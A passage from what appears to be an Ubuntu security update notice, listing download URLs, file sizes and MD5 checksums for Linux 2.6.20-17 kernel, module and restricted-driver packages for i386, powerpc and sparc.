http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_i386.deb
  Size/MD5:  1376080 39281eee5e0b5d6ea831675349ee365f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/avm-fritz-firmware-2.6.20-17_3.11+2.6.20.6-17.31_i386.deb
  Size/MD5:  1207908 b07a58f361554e355338ca08d44e8554
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/fglrx-control_8.34.8+2.6.20.6-17.31_i386.deb
  Size/MD5:    77680 b30bcb45b4d6f7421ef5fb757554d830
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-386_2.6.20.6-17.31_i386.deb
  Size/MD5: 16340226 0e7dd6aacb36a5601e80ba98555edc11
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-generic_2.6.20.6-17.31_i386.deb
  Size/MD5: 16096356 77590a41029409066d5093fcdf1127e9
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-386-di_2.6.20.6-17.31_i386.udeb
  Size/MD5:   966226 3a154fc15eecb9458f89939015ce51de
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_i386.udeb
  Size/MD5:   966294 cb62f0ea1152f4c9c890b80e4427521e
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-386-di_2.6.20.6-17.31_i386.udeb
  Size/MD5:  2120570 11bc64fd197a751a742a6956ae0fd9a6
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-generic-di_2.6.20.6-17.31_i386.udeb
  Size/MD5:  2160580 6d566ca1acbd7fc9b5f795daeeaedd88
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_i386.deb
  Size/MD5:   156130 bd651a0a3892fdc3d5ff187cc0a45488
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new-dev_1.0.9755+2.6.20.6-17.31_i386.deb
  Size/MD5:   156600 5a124f9290921dac4d77a349b3ac070e
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new_1.0.9755+2.6.20.6-17.31_i386.deb
  Size/MD5:  4833270 1e6deb4cfbd5cbf29d8f79b0e597c454
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_i386.deb
  Size/MD5:  4492558 c56ab1045d05d8560a41a7b87e2a1c39
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-new-kernel-source_1.0.9755+2.6.20.6-17.31_i386.deb
  Size/MD5:  2454162 55179cc72ce26c101aedb84841e1eb08
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-player-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb
  Size/MD5:  1666848 ebb6fbab6e18332d046fa0d79abc9c0f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb
  Size/MD5:  2860690 ae88be47f7596e2c8316f4e3a22377ec
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-tools-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb
  Size/MD5:   760492 a392956778451398b8da03b1c79bc051
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx-dev_7.1.0-8.34.8+2.6.20.6-17.31_i386.deb
  Size/MD5:   130326 755509fec142e17ce0dd45b9e929064c
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_i386.deb
  Size/MD5:  6143092 6d6f3014f01f78b0dd8783366bc5563f
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb
  Size/MD5: 23844798 a165f36a05f57654361b4646218e9e9e
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb
  Size/MD5: 24183826 a75c933ed52aa1c39a22bec126889627

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc-smp_2.6.20-17.12_powerpc.deb
  Size/MD5:    93372 810566bb7bb90b911ee2dc796e8c6cfd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc64-smp_2.6.20-17.12_powerpc.deb
  Size/MD5:   118178 08fecf5875b7515466304a5e556d9c82
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc_2.6.20-17.12_powerpc.deb
  Size/MD5:    92842 4d4192118b9b0f015678bfcd21e6445c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-powerpc-di_2.6.20-17.12_powerpc.udeb
  Size/MD5:    95164 2c39459a0a423d23a74a52229d48d9cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.12_powerpc.udeb
  Size/MD5:   130572 82ae1b3368e8e7779670bd70196cde66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   328832 592f394abdc8a41de6f89a16aa8dceed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   325582 d502b2644f843efde702815b028c1618
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    41184 31ce69aa1a6c5a51fb21dd2546ddb7d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    47450 6fbc8b234f4b98e3f66d8ff4f187c74c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   219678 9516e67812981692229cc9aba7e9b155
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   239166 7f7662bb24b02f1a44f738354686ae93
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    43654 b44df31b967a80e31758c41e05ef2c09
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    39792 5cfed09a0fa48ce3838b2ba21ba4dad1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   717818 5375198b75e2a9a5d9f410af42d95524
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   776424 83319a673c7c9b10461de0aefd6e988b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   205086 aa0011d2dedf01aa32c1837777c7c2f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   209728 caee4552ea2b0b3d9e43b9610ca91adf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    59226 bd1604cf99df7ca4b0522ba0c1441452
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    66860 a47c0ac4b101a2b40bb2f311424d0515
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    64206 08027501addf0c66a9ea6cfb41227300
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    65330 5e617fdfc44c7335fc985e642d6c4130
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   144094 6ee22538b68ddda69ad8469d03cefec6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   162836 4258bd871f4baf4f81a1d5cc940058e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   383348 0d6dd42f3a57d99915c48252c47c7c6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   251812 b7f4e7cd8e7661da5f3c57d67d395420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  2157764 98a7bbb74cc5e35b7bddc4d8fc12dd35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  3083674 83e44937cfeecffdef687e70f13b1093
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb
  Size/MD5:   864430 7bf3208e87d976b60431d01aa84703d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb
  Size/MD5:   868770 0212168af66d47b1953bf59beb405822
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb
  Size/MD5:   862718 0edc424b8e413441e74362954ba58b09
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_powerpc.deb
  Size/MD5:  8151920 cc6e385dce05073af3df268acce45ebd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb
  Size/MD5: 24517498 cf103d3e1ed625118d0998b12bab86bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb
  Size/MD5: 26861638 cbde33235ec6a7a6046ee860176b1593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb
  Size/MD5: 24220490 e556a72ab4e97dfb786e72d740fa2f24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb
  Size/MD5:  2128680 cfe9700869769c505d5b8d1d1c196e4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb
  Size/MD5:  2855084 b3cc89ef46e5e4d06b2653172fe3b283
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb
  Size/MD5:  2050182 3bc2e7f25ebe8bea2839aebde16ffcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_powerpc.deb
  Size/MD5:   645210 3c8a7642f76a3bab805c4deb34a7cac0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   253008 447d9c9761dfe18be30d647e1b96ba74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   295072 a08094ed9b4cdb0b20b4ef07fe6a5496
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   155558 8c9bcba70f826b2c4fb871ebf3a12730
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   168430 19b9a0c1a718af5acaa1a97d28f23450
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   248328 7a33c002d5adebd73837fb91df317c41
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   280138 8d505bd1e195b9b165529180732ca1af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  1110500 8f0022f1c5e95795aaaa1a07e814957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  1110660 881fe6e0eaa3db15879e0e893684509d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  1951192 7e74e7050d2af4763c728f9e6f52b8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  2253422 13f6832a0289630d2e088812dbe1f8d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   233498 0e5efa4dc2c1d60f2d63f736dcd3f720
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   223070 da1c37cf1a9665c274cdedb7d7d13dce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   172914 879737cfde3f122ef489bd0a34e8d1f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   205506 5b476284715dabe07a18acd0365b3f23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   280976 1c05e11f0c7f33fa2ed6ed13650b396e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   316584 b4c7b3b1ec87ba54dddcc5d7ed85f148
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    44652 92750df6fd5855b3b84539e7ee40bad7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    43410 7de7ea097bbd5b0097c8a8dc21c362b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    41212 85c1a08a0dcc9cdc4999243b4607f277
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    53694 3a9e0e870d09ff29d98ea397eb9ca38f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    72814 f069b8db376da6ba6523c1f1a1744a05
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    85272 6dc2d289a49942a9beba89f338f11bca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    74542 64495f2bd744e1285c20f04aa7dc3a98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    29722 26ac6df4a55fd8a7168ded5d445aa891
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:     8396 a7dee9e87ee7e13108a2abf55958ee31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:     9878 1c5f8521e8c11ec701f492a2b14d220f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    56170 927213142db35ecd6e22cb7b6c64314e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    67412 3eef4694fda05e830ac9b0d649879387
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    86632 244854a18a5ed03c371bb05b9f2142c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   129200 a76825598a96c16432ed54bbd9288f5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   322566 7f7779fa071fce5f29f59ce076e21853
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   322588 0cafc2b9ef45c349253c52e3de0c5c36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  1415810 bf842d6db566d7be83f36be0e045cdec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:  1345396 0463bf1a542fbf4ecf4ce2e4420a933c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    74242 2b6a9627312c1586aabdcdf4f7c8892b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    83244 6bac15c4400ddefb121c19b440bd30a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    12020 430e6dd156acd4313105e5e8d808c0ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    13940 2080831826d60e6e87672ddf66f0c6c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    78350 0b82c56c00c548e9a96c2ca73cec6f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    85460 4361070d89cfb39069ea8989da654076
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   398184 3a97b6bc7374983dfd5d99ba425886d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   445198 85fe66984eccab5882988b168735b544
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:    76712 6da01c2a1af08c51050eb89082bc244c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb
  Size/MD5:   100188 ba1822b9e7dacd482afa36a1a853db3e
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc-smp_2.6.20.6-17.31_powerpc.deb
  Size/MD5:  1295164 bfd9c631a8c1eaf0d77f960052c83dd4
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc64-smp_2.6.20.6-17.31_powerpc.deb
  Size/MD5:   998682 a82f0cb709d699144fecad690e04f602
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc_2.6.20.6-17.31_powerpc.deb
  Size/MD5:  1292544 1bd7e025d89460f69ad71fcbd8731781
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-powerpc-di_2.6.20.6-17.31_powerpc.udeb
  Size/MD5:   966288 8b862192df81aba11c1f6cfe2bd4eee1
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-powerpc-di_2.6.20.6-17.31_powerpc.udeb
  Size/MD5:   295204 df056e69d9aa45f76533009d499c6585

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64-smp_2.6.20-17.12_sparc.deb
  Size/MD5:    95642 6d7c17541cee91e8eb06912a9f20a396
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64_2.6.20-17.12_sparc.deb
  Size/MD5:    95344 8db377d069385f539a621e562b2df10b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-sparc64-di_2.6.20-17.12_sparc.udeb
  Size/MD5:    99130 2f245b90b8b087f61da2caf49f524fbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    53734 0680b9f0398d7e48c53e7295c77cab8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    42158 3da50612014614dac0ab87c946c65e6f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   211716 77368597943d10a9a5586f8a1ecc06db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   607912 8da7a2b5371fb5f1a302a6e57e4ae95e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   142716 73f99532873b9c75317de0adb7471740
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    51444 f42e7104565f89629799aa413dca2b7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    37414 12f0474f7342185f4d1b0b587c55f2f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   151172 086fc37a2e1e76e3022f2254574affc8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:  1933034 e1905a3433fad1d9462bea90cdc91535
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb
  Size/MD5:   780696 0ec6f4b5e642f0193e6c02ea4465008a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb
  Size/MD5:   776890 0e303a6399f5d569ee7984a2b010c500
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_sparc.deb
  Size/MD5:  8122866 d8d4552de1aa0078c02c0e428b6dd48a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb
  Size/MD5: 16953716 0b6bcacad41c64b40fa2d3b97557acf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb
  Size/MD5: 16601038 9033c13349be02c8001f47d79888e214
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb
  Size/MD5:  2264344 ab3e7e36ec1257d862dd600eff70ccaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb
  Size/MD5:  2178562 67786fc133bf741d728c88ba444d3537
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_sparc.deb
  Size/MD5:   700414 8b12ede19495f6b05c30288cfe31f866
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   264342 9906bcc6b5467bf2c1245eca6054eae5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   156570 4191f2a0d742efeccb67443b3945ff44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   241232 e8523b32012e66d586f5df1cd381ea73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:  1110488 174c4c5a9e61867ad11e78dd808f9d42
